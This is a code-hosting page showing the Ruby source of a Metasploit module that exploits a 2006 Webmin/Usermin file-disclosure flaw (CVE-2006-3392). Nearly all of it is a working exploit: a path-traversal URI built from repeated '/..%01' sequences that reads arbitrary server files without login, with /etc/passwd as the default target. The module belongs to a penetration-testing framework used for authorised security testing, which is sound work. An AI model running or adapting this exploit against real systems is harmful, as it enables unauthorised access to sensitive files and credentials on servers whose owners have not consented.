Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/webmin/file_disclosure.rb
19852 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Webmin File Disclosure',

14
        'Description' => %q{

15
          A vulnerability has been reported in Webmin and Usermin, which can be

16
          exploited by malicious people to disclose potentially sensitive information.

17
          The vulnerability is caused due to an unspecified error within the handling

18
          of an URL. This can be exploited to read the contents of any files on the

19
          server via a specially crafted URL, without requiring a valid login.

20
          The vulnerability has been reported in Webmin (versions prior to 1.290) and

21
          Usermin (versions prior to 1.220).

22
        },

23
        'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          ['OSVDB', '26772'],

27
          ['BID', '18744'],

28
          ['CVE', '2006-3392'],

29
          ['US-CERT-VU', '999601'],

30
          ['URL', 'https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/'],

31
        ],

32
        'DisclosureDate' => '2006-06-30',

33
        'Actions' => [

34
          ['Download', { 'Description' => 'Download arbitrary file' }]

35
        ],

36
        'DefaultAction' => 'Download',

37
        'Notes' => {

38
          'Stability' => [CRASH_SAFE],

39
          'SideEffects' => [IOC_IN_LOGS],

40
          'Reliability' => []

41
        }

42
      )

43
    )

44


45
    register_options(

46
      [

47
        Opt::RPORT(10000),

48
        OptString.new(

49
          'RPATH',

50
          [

51
            true,

52
            'The file to download',

53
            '/etc/passwd'

54
          ]

55
        ),

56
        OptString.new(

57
          'DIR',

58
          [

59
            true,

60
            'Webmin directory path',

61
            '/unauthenticated'

62
          ]

63
        ),

64
      ]

65
    )

66
  end

67


68
  def run

69
    print_status("Attempting to retrieve #{datastore['RPATH']}...")

70


71
    dir = normalize_uri(datastore['DIR'])

72
    uri = Rex::Text.uri_encode(dir) + '/..%01' * 40 + Rex::Text.uri_encode(datastore['RPATH'])

73


74
    res = send_request_raw({

75
      'uri' => uri

76
    }, 10)

77


78
    if res

79
      print_status("The server returned: #{res.code} #{res.message}")

80
      print(res.body)

81
    else

82
      print_status('No response from the server')

83
    end

84
  end

85
end

86


87